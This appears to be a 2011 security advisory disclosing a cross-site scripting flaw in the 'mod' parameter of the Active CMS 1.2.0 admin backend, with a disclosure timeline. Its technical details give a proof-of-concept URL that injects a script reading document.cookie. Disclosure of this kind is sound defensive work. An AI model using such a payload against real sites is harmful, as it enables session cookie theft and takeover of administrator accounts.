SSCHADV2011-020 - Active CMS 1.2.0 'mod' Cross-site Scripting Vulnerability
Advisory:
|
Active CMS 1.2.0 ‘mod’ Cross-site Scripting Vulnerability
|
Advisory ID:
|
SSCHADV2011-020
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Active CMS 1.2.0
|
Vendor URL:
|
|
Vendor Status:
|
informed
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
The backend of Active CMS 1.2.0 is prone to Cross-Site scripting vulnerability
Vulnerability Description:
======================
The backend of Active CMS 1.2.0 is prone to Cross-Site scripting vulnerability
==============
Technical Details:
==============
Technical Details:
==============
http://<target>/activecms/admin/admin?action=module&mod=’<script>alert(document.cookie)</script>
|
=====
Solution:
=====
Solution:
=====
-
================
Disclosure Timeline:
================
Disclosure Timeline:
================
28-Sep-2011 – informed developers
29-Sep-2011 – release date of this security advisory
06-Oct-2011 – post on BugTraq
====
Credits:
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
References:
=======
Comments
Display comments as Linear | Threaded